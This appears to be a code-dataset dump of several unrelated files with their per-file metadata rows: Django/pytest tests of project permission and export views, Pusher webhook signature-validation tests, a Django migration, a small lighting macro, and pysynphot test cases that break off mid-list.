if project_id in change_project_permission_map.get(username, []):
assert response.status_code == 302
assert Project.objects.get(pk=project_id).title == 'New title'
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
assert Project.objects.get(pk=project_id).title == project.title
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_post_parent(db, client, username, password, project_id):
client.login(username=username, password=password)
project = Project.objects.get(pk=project_id)
url = reverse('project_update', args=[project_id])
data = {
'title': project.title,
'description': project.description,
'catalog': project.catalog.pk,
'parent': parent_project_id
}
response = client.post(url, data)
if project_id in change_project_permission_map.get(username, []):
if project_id == parent_project_id:
assert response.status_code == 200
assert Project.objects.get(pk=project_id).parent == project.parent
else:
assert response.status_code == 302
assert Project.objects.get(pk=project_id).parent_id == parent_project_id
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
assert Project.objects.get(pk=project_id).parent == project.parent
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_information_get(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_update_information', args=[project_id])
response = client.get(url)
if project_id in change_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_information_post(db, client, username, password, project_id):
client.login(username=username, password=password)
project = Project.objects.get(pk=project_id)
url = reverse('project_update_information', args=[project_id])
data = {
'title': 'Lorem ipsum dolor sit amet',
'description': 'At vero eos et accusam et justo duo dolores et ea rebum.'
}
response = client.post(url, data)
if project_id in change_project_permission_map.get(username, []):
assert response.status_code == 302
assert Project.objects.get(pk=project_id).title == 'Lorem ipsum dolor sit amet'
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
assert Project.objects.get(pk=project_id).title == project.title
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_catalog_get(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_update_catalog', args=[project_id])
response = client.get(url)
if project_id in change_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_catalog_post(db, client, username, password, project_id):
client.login(username=username, password=password)
project = Project.objects.get(pk=project_id)
url = reverse('project_update_catalog', args=[project_id])
data = {
'catalog': catalog_id
}
response = client.post(url, data)
if project_id in change_project_permission_map.get(username, []):
assert response.status_code == 302
assert Project.objects.get(pk=project_id).catalog_id == catalog_id
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
assert Project.objects.get(pk=project_id).catalog == project.catalog
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_tasks_get(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_update_tasks', args=[project_id])
response = client.get(url)
if project_id in change_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_tasks_post(db, client, username, password, project_id):
client.login(username=username, password=password)
project = Project.objects.get(pk=project_id)
url = reverse('project_update_tasks', args=[project_id])
data = {
'tasks': []
}
response = client.post(url, data)
if project_id in change_project_permission_map.get(username, []):
assert response.status_code == 302
assert list(Project.objects.get(pk=project_id).tasks.values('id')) == []
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
assert list(Project.objects.get(pk=project_id).tasks.values('id')) == list(project.tasks.values('id'))
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_views_get(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_update_views', args=[project_id])
response = client.get(url)
if project_id in change_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_views_post(db, client, username, password, project_id):
client.login(username=username, password=password)
project = Project.objects.get(pk=project_id)
url = reverse('project_update_views', args=[project_id])
data = {
'views': []
}
response = client.post(url, data)
if project_id in change_project_permission_map.get(username, []):
assert response.status_code == 302
assert list(Project.objects.get(pk=project_id).views.values('id')) == []
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
assert list(Project.objects.get(pk=project_id).views.values('id')) == list(project.views.values('id'))
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_parent_get(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_update_parent', args=[project_id])
response = client.get(url)
if project_id in change_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_parent_post(db, client, username, password, project_id):
client.login(username=username, password=password)
project = Project.objects.get(pk=project_id)
url = reverse('project_update_parent', args=[project_id])
data = {
'parent': parent_project_id
}
response = client.post(url, data)
if project_id in change_project_permission_map.get(username, []):
if project_id == parent_project_id:
assert response.status_code == 200
assert Project.objects.get(pk=project_id).parent == project.parent
else:
assert response.status_code == 302
assert Project.objects.get(pk=project_id).parent_id == parent_project_id
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
assert Project.objects.get(pk=project_id).parent == project.parent
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_delete_get(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_delete', args=[project_id])
response = client.get(url)
if project_id in delete_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_delete_post(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_delete', args=[project_id])
response = client.post(url)
if project_id in delete_project_permission_map.get(username, []):
assert response.status_code == 302
assert not Project.objects.filter(pk=project_id).first()
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
assert Project.objects.filter(pk=project_id).first()
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_export_xml(db, client, files, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_export', args=[project_id, 'xml'])
response = client.get(url)
if project_id in export_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_export_csv(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_export', args=[project_id, 'csvcomma'])
response = client.get(url)
if project_id in export_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_export_csvsemicolon(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_export', args=[project_id, 'csvsemicolon'])
response = client.get(url)
if project_id in export_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_answers(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_answers', args=[project_id])
response = client.get(url)
if project_id in view_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
@pytest.mark.parametrize('export_format', export_formats)
def test_project_answers_export(db, client, username, password, project_id, export_format):
client.login(username=username, password=password)
url = reverse('project_answers_export', args=[project_id, export_format])
response = client.get(url)
if project_id in view_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_view(db, client, username, password, project_id):
client.login(username=username, password=password)
project_views = Project.objects.get(pk=project_id).views.all()
for view in View.objects.all():
url = reverse('project_view', args=[project_id, view.id])
response = client.get(url)
if project_id in view_project_permission_map.get(username, []):
if view in project_views:
assert response.status_code == 200
else:
assert response.status_code == 404
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
@pytest.mark.parametrize('export_format', export_formats)
def test_project_view_export(db, client, username, password, project_id, export_format):
client.login(username=username, password=password)
project_views = Project.objects.get(pk=project_id).views.all()
for view in View.objects.all():
url = reverse('project_view_export', args=[project_id, view.pk, export_format])
response = client.get(url)
if project_id in view_project_permission_map.get(username, []):
if view in project_views:
assert response.status_code == 200
else:
assert response.status_code == 404
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_questions(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_questions', args=[project_id])
response = client.get(url)
if project_id in view_project_permission_map.get(username, []):
assert response.status_code == 200
elif password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_error(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_questions', args=[project_id])
response = client.get(url)
if project_id in view_project_permission_map.get(username, []):
assert response.status_code == 200
elif password:
assert response.status_code == 403
else:
assert response.status_code == 302
| 33.757208
| 110
| 0.673964
| 2,728
| 22,246
| 5.313416
| 0.048387
| 0.088789
| 0.124181
| 0.149017
| 0.940738
| 0.938875
| 0.933356
| 0.92425
| 0.900586
| 0.894446
| 0
| 0.021531
| 0.206644
| 22,246
| 658
| 111
| 33.808511
| 0.799762
| 0.001438
| 0
| 0.793774
| 0
| 0
| 0.085584
| 0.008239
| 0
| 0
| 0
| 0
| 0.227626
| 1
| 0.058366
| false
| 0.233463
| 0.009728
| 0
| 0.068093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
0920fdaff0e8ab40f9315b77f6667b6c1bba67a7
| 5,400
|
py
|
Python
|
app/tests/routers/test_webhooks.py
|
kalaspuff/newshades-api
|
e22a8875b6e50f71e67dfdaf7b1b3e85817fb5b9
|
[
"CC0-1.0"
] | null | null | null |
app/tests/routers/test_webhooks.py
|
kalaspuff/newshades-api
|
e22a8875b6e50f71e67dfdaf7b1b3e85817fb5b9
|
[
"CC0-1.0"
] | null | null | null |
app/tests/routers/test_webhooks.py
|
kalaspuff/newshades-api
|
e22a8875b6e50f71e67dfdaf7b1b3e85817fb5b9
|
[
"CC0-1.0"
] | null | null | null |
import asyncio
import hashlib
import hmac
import json
import random
import time
import arrow
import pytest
from fastapi import FastAPI
from httpx import AsyncClient
from pymongo.database import Database
from app.config import get_settings
from app.models.user import User
class TestWebhookRoutes:
@pytest.mark.asyncio
async def test_pusher_channel_occupied(
self, app: FastAPI, db: Database, current_user: User, authorized_client: AsyncClient, event_loop
):
settings = get_settings()
assert current_user.online_channels == []
channel_id = f"private-{str(current_user.id)}"
current_time = time.time() * 1000
json_data = {"time_ms": current_time, "events": [{"channel": channel_id, "name": "channel_occupied"}]}
signature = hmac.new(
settings.pusher_secret.encode("utf8"), json.dumps(json_data).encode("utf8"), hashlib.sha256
).hexdigest()
headers = {"X-Pusher-Key": settings.pusher_key, "X-Pusher-Signature": signature}
response = await authorized_client.post("/webhooks/pusher", json=json_data, headers=headers)
assert response.status_code == 200
await asyncio.sleep(random.random(), loop=event_loop)
await current_user.reload()
assert current_user.online_channels == [channel_id]
@pytest.mark.asyncio
async def test_pusher_channel_vacated(
self, app: FastAPI, db: Database, current_user: User, authorized_client: AsyncClient, event_loop
):
settings = get_settings()
channel_id = f"private-{str(current_user.id)}"
current_user.online_channels = [channel_id]
await current_user.commit()
assert current_user.online_channels == [channel_id]
current_time = time.time() * 1000
json_data = {"time_ms": current_time, "events": [{"channel": channel_id, "name": "channel_vacated"}]}
signature = hmac.new(
settings.pusher_secret.encode("utf8"), json.dumps(json_data).encode("utf8"), hashlib.sha256
).hexdigest()
headers = {"X-Pusher-Key": settings.pusher_key, "X-Pusher-Signature": signature}
response = await authorized_client.post("/webhooks/pusher", json=json_data, headers=headers)
assert response.status_code == 200
await asyncio.sleep(random.random(), loop=event_loop)
await current_user.reload()
assert current_user.online_channels == []
@pytest.mark.asyncio
async def test_pusher_expired_webhook(
self,
app: FastAPI,
db: Database,
current_user: User,
authorized_client: AsyncClient,
):
settings = get_settings()
channel_id = f"private-{str(current_user.id)}"
current_user.online_channels = [channel_id]
await current_user.commit()
assert current_user.online_channels == [channel_id]
current_time = arrow.utcnow().shift(days=-1).float_timestamp * 1000
json_data = {"time_ms": current_time, "events": [{"channel": channel_id, "name": "channel_vacated"}]}
signature = hmac.new(
settings.pusher_secret.encode("utf8"), json.dumps(json_data).encode("utf8"), hashlib.sha256
).hexdigest()
headers = {"X-Pusher-Key": settings.pusher_key, "X-Pusher-Signature": signature}
response = await authorized_client.post("/webhooks/pusher", json=json_data, headers=headers)
assert response.status_code == 401
@pytest.mark.asyncio
async def test_pusher_bad_signature(
self,
app: FastAPI,
db: Database,
current_user: User,
authorized_client: AsyncClient,
):
settings = get_settings()
channel_id = f"private-{str(current_user.id)}"
current_user.online_channels = [channel_id]
await current_user.commit()
assert current_user.online_channels == [channel_id]
current_time = time.time() * 1000
json_data = {"time_ms": current_time, "events": [{"channel": channel_id, "name": "channel_vacated"}]}
signature = hmac.new(
settings.pusher_secret.encode("utf8"), json.dumps(json_data).encode("utf8"), hashlib.sha256
).hexdigest()
headers = {"X-Pusher-Key": settings.pusher_key, "X-Pusher-Signature": f"{signature}-hack"}
response = await authorized_client.post("/webhooks/pusher", json=json_data, headers=headers)
assert response.status_code == 401
@pytest.mark.asyncio
async def test_pusher_bad_key(
self,
app: FastAPI,
db: Database,
current_user: User,
authorized_client: AsyncClient,
):
settings = get_settings()
channel_id = f"private-{str(current_user.id)}"
current_user.online_channels = [channel_id]
await current_user.commit()
assert current_user.online_channels == [channel_id]
current_time = time.time() * 1000
json_data = {"time_ms": current_time, "events": [{"channel": channel_id, "name": "channel_vacated"}]}
signature = hmac.new(
settings.pusher_secret.encode("utf8"), json.dumps(json_data).encode("utf8"), hashlib.sha256
).hexdigest()
headers = {"X-Pusher-Key": "no-key", "X-Pusher-Signature": signature}
response = await authorized_client.post("/webhooks/pusher", json=json_data, headers=headers)
assert response.status_code == 401
| 40.601504
| 110
| 0.663704
| 632
| 5,400
| 5.446203
| 0.131329
| 0.086287
| 0.054329
| 0.079895
| 0.897443
| 0.897443
| 0.897443
| 0.875654
| 0.851249
| 0.842243
| 0
| 0.014414
| 0.216296
| 5,400
| 132
| 111
| 40.909091
| 0.798913
| 0
| 0
| 0.8
| 0
| 0
| 0.118148
| 0.027778
| 0
| 0
| 0
| 0
| 0.104348
| 1
| 0
| false
| 0
| 0.113043
| 0
| 0.121739
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
09427767e0844aa1b08fbee0f4f5a9f3087225d5
| 3,699
|
py
|
Python
|
ghostwriter/shepherd/migrations/0035_auto_20220205_0026.py
|
bbhunter/Ghostwriter
|
1b684ddd119feed9891e83b39c9b314b41d086ca
|
[
"BSD-3-Clause"
] | 1
|
2022-02-04T20:24:35.000Z
|
2022-02-04T20:24:35.000Z
|
ghostwriter/shepherd/migrations/0035_auto_20220205_0026.py
|
bbhunter/Ghostwriter
|
1b684ddd119feed9891e83b39c9b314b41d086ca
|
[
"BSD-3-Clause"
] | null | null | null |
ghostwriter/shepherd/migrations/0035_auto_20220205_0026.py
|
bbhunter/Ghostwriter
|
1b684ddd119feed9891e83b39c9b314b41d086ca
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 3.2.11 on 2022-02-05 00:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shepherd', '0034_remove_domain_health_dns'),
]
operations = [
migrations.AlterField(
model_name='activitytype',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='auxserveraddress',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='domain',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='domainnote',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='domainserverconnection',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='domainstatus',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='healthstatus',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='history',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='serverhistory',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='servernote',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='serverprovider',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='serverrole',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='serverstatus',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='staticserver',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='transientserver',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='whoisstatus',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 39.351064
| 111
| 0.60638
| 366
| 3,699
| 5.942623
| 0.153005
| 0.088276
| 0.183908
| 0.213333
| 0.825287
| 0.825287
| 0.825287
| 0.825287
| 0.825287
| 0.825287
| 0
| 0.007449
| 0.274128
| 3,699
| 93
| 112
| 39.774194
| 0.802607
| 0.012436
| 0
| 0.735632
| 1
| 0
| 0.0808
| 0.013969
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011494
| 0
| 0.045977
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
094b162f94aef9b6c8d72a35140ceb1cb7970705
| 250
|
py
|
Python
|
Macros/Colours/Pink/Pink.py
|
rec/dmxis
|
540baa59df6f4ae39990e5888f90b95caa362279
|
[
"Artistic-2.0"
] | 2
|
2019-05-26T15:11:18.000Z
|
2021-12-27T21:05:32.000Z
|
Macros/Colours/Pink/Pink.py
|
rec/DMXIS
|
540baa59df6f4ae39990e5888f90b95caa362279
|
[
"Artistic-2.0"
] | null | null | null |
Macros/Colours/Pink/Pink.py
|
rec/DMXIS
|
540baa59df6f4ae39990e5888f90b95caa362279
|
[
"Artistic-2.0"
] | null | null | null |
#===============================================================
# DMXIS Macro (c) 2010 db audioware limited
#===============================================================
import System.RGB
from System.RGB import *
RgbColour(255,192,203)
| 27.777778
| 65
| 0.34
| 18
| 250
| 4.722222
| 0.833333
| 0.211765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058296
| 0.108
| 250
| 8
| 66
| 31.25
| 0.32287
| 0.672
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
11d443e4e2a2185d8bec490c10e4085a1a5323ca
| 515
|
py
|
Python
|
cv_lib/cv_lib/segmentation/models/__init__.py
|
squassina/seismic-deeplearning
|
ffb2855249e581f4900665c2616cefb019621675
|
[
"MIT"
] | 270
|
2019-12-17T13:40:51.000Z
|
2022-03-20T10:02:11.000Z
|
cv_lib/cv_lib/segmentation/models/__init__.py
|
squassina/seismic-deeplearning
|
ffb2855249e581f4900665c2616cefb019621675
|
[
"MIT"
] | 233
|
2019-12-18T17:59:36.000Z
|
2021-08-03T13:43:49.000Z
|
cv_lib/cv_lib/segmentation/models/__init__.py
|
squassina/seismic-deeplearning
|
ffb2855249e581f4900665c2616cefb019621675
|
[
"MIT"
] | 118
|
2019-12-17T13:41:43.000Z
|
2022-03-29T02:06:36.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import cv_lib.segmentation.models.seg_hrnet # noqa: F401
import cv_lib.segmentation.models.resnet_unet # noqa: F401
import cv_lib.segmentation.models.unet # noqa: F401
import cv_lib.segmentation.models.section_deconvnet # noqa: F401
import cv_lib.segmentation.models.patch_deconvnet # noqa: F401
import cv_lib.segmentation.models.patch_deconvnet_skip # noqa: F401
import cv_lib.segmentation.models.section_deconvnet_skip # noqa: F401
| 46.818182
| 70
| 0.815534
| 73
| 515
| 5.547945
| 0.328767
| 0.138272
| 0.190123
| 0.397531
| 0.787654
| 0.716049
| 0.716049
| 0.624691
| 0.51358
| 0.274074
| 0
| 0.045553
| 0.104854
| 515
| 10
| 71
| 51.5
| 0.832972
| 0.281553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
11ee4afb8b55e5dcf04950d223bd62bcd89dc58d
| 100
|
py
|
Python
|
python/src/example.py
|
kodability/test-images
|
def67f4e8b6798df7a3b6d1a1f3c045e1d3d6c07
|
[
"Apache-2.0"
] | null | null | null |
python/src/example.py
|
kodability/test-images
|
def67f4e8b6798df7a3b6d1a1f3c045e1d3d6c07
|
[
"Apache-2.0"
] | null | null | null |
python/src/example.py
|
kodability/test-images
|
def67f4e8b6798df7a3b6d1a1f3c045e1d3d6c07
|
[
"Apache-2.0"
] | null | null | null |
def sum(value_from, value_to):
return (value_from + value_to) * (value_to - value_from + 1) / 2
| 33.333333
| 68
| 0.68
| 17
| 100
| 3.647059
| 0.470588
| 0.435484
| 0.451613
| 0.516129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024691
| 0.19
| 100
| 2
| 69
| 50
| 0.740741
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
11f7d1934fa29a2e21ee62102e3487c4e0d57512
| 30,556
|
py
|
Python
|
commissioning/wfc3_uvis1_spec_62_cases.py
|
dobos/pysynphot
|
5d2e0b52ceda78890940ac9239c2d88e149e0bed
|
[
"BSD-3-Clause"
] | 24
|
2015-01-04T23:38:21.000Z
|
2022-02-01T00:11:07.000Z
|
commissioning/wfc3_uvis1_spec_62_cases.py
|
dobos/pysynphot
|
5d2e0b52ceda78890940ac9239c2d88e149e0bed
|
[
"BSD-3-Clause"
] | 126
|
2015-01-29T14:50:37.000Z
|
2022-02-15T01:58:13.000Z
|
commissioning/wfc3_uvis1_spec_62_cases.py
|
dobos/pysynphot
|
5d2e0b52ceda78890940ac9239c2d88e149e0bed
|
[
"BSD-3-Clause"
] | 25
|
2015-02-09T12:12:02.000Z
|
2021-09-09T13:06:54.000Z
|
from pytools import testutil
import sys
import basecase
class calcspecCase1(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="icat(k93models,9230,0.0,4.1)"
self.subset=True
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class countrateCase1(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=True
self.etcid="['uvsp1006.tab:5000', 'uvsp1006.tab:5001', 'uvsp1006.tab:5002', 'uvsp1006.tab:5003', 'uvsp1006.tab:5004', 'uvsp1006.tab:5005', 'uvsp1006.tab:5006', 'uvsp1006.tab:5007', 'uvsp1006.tab:5008', 'uvsp1006.tab:5009', 'uvsp1006.tab:5010', 'uvsp1006.tab:5011', 'uvsp1006.tab:5012', 'uvsp1006.tab:5013', 'uvsp1006.tab:5014', 'uvsp1006.tab:5015', 'uvsp1006.tab:5016', 'uvsp1006.tab:5017', 'uvsp1006.tab:5018', 'uvsp1006.tab:5019', 'uvsp1006.tab:5020', 'uvsp1006.tab:5021', 'uvsp1006.tab:5022', 'uvsp1006.tab:5023', 'uvsp1006.tab:5024', 'uvsp1006.tab:5025', 'uvsp1006.tab:5026', 'uvsp1006.tab:5027', 'uvsp1006.tab:5028', 'uvsp1006.tab:5029', 'uvsp1006.tab:5030', 'uvsp1006.tab:5031', 'uvsp1006.tab:5032', 'uvsp1006.tab:5033', 'uvsp1006.tab:5034', 'uvsp1006.tab:5035', 'uvsp1006.tab:5036', 'uvsp1006.tab:5037', 'uvsp1006.tab:5038', 'uvsp1006.tab:5039', 'uvsp1006.tab:5040', 'uvsp1006.tab:5041', 'uvsp1006.tab:5042', 'uvsp1006.tab:5043', 'uvsp1006.tab:5044', 'uvsp1006.tab:5045', 'uvsp1006.tab:5046', 'uvsp1006.tab:5047', 'uvsp1006.tab:5048', 'uvsp1006.tab:5049', 'uvsp1006.tab:5050', 'uvsp1006.tab:5051', 'uvsp1006.tab:5052', 'uvsp1006.tab:5053', 'uvsp1006.tab:5054', 'uvsp1006.tab:5055', 'uvsp1006.tab:5056', 'uvsp1006.tab:5057', 'uvsp1006.tab:5058', 'uvsp1006.tab:5059', 'uvsp1006.tab:5060', 'uvsp1006.tab:5061', 'uvsp1006.tab:5062', 'uvsp1006.tab:5063', 'uvsp1006.tab:5064', 'uvsp1006.tab:5065', 'uvsp1006.tab:5066', 'uvsp1006.tab:5067', 'uvsp1006.tab:5068', 'uvsp1006.tab:5069', 'uvsp1006.tab:5070', 'uvsp1006.tab:5071', 'uvsp1006.tab:5072', 'uvsp1006.tab:5073', 'uvsp1006.tab:5074', 'uvsp1006.tab:5075', 'uvsp1006.tab:5076', 'uvsp1006.tab:5077', 'uvsp1006.tab:5078', 'uvsp1006.tab:5079', 'uvsp1006.tab:5080', 'uvsp1006.tab:5081', 'uvsp1006.tab:5082', 'uvsp1006.tab:5083', 'uvsp1006.tab:5084', 'uvsp1006.tab:5085', 'uvsp1006.tab:5086', 'uvsp1006.tab:5087', 'uvsp1006.tab:5088', 'uvsp1006.tab:5089', 'uvsp1006.tab:5090', 'uvsp1006.tab:5091', 'uvsp1006.tab:5092', 'uvsp1006.tab:5093', 'uvsp1006.tab:5094', 'uvsp1006.tab:5095', 'uvsp1006.tab:5096', 'uvsp1006.tab:5097', 'uvsp1006.tab:5098', 'uvsp1006.tab:5099', 'uvsp1006.tab:5100', 'uvsp1006.tab:5101', 'uvsp1006.tab:5102', 'uvsp1006.tab:5103', 'uvsp1006.tab:5104', 'uvsp1006.tab:5105', 'uvsp1006.tab:5106', 'uvsp1006.tab:5107', 'uvsp1006.tab:5108', 'uvsp1006.tab:5109', 'uvsp1006.tab:5110', 'uvsp1006.tab:5111', 'uvsp1006.tab:5112', 'uvsp1006.tab:5113', 'uvsp1006.tab:5114', 'uvsp1006.tab:5115', 'uvsp1006.tab:5116', 'uvsp1006.tab:5117', 'uvsp1006.tab:5118', 'uvsp1006.tab:5119', 'uvsp1006.tab:5120', 'uvsp1006.tab:5121', 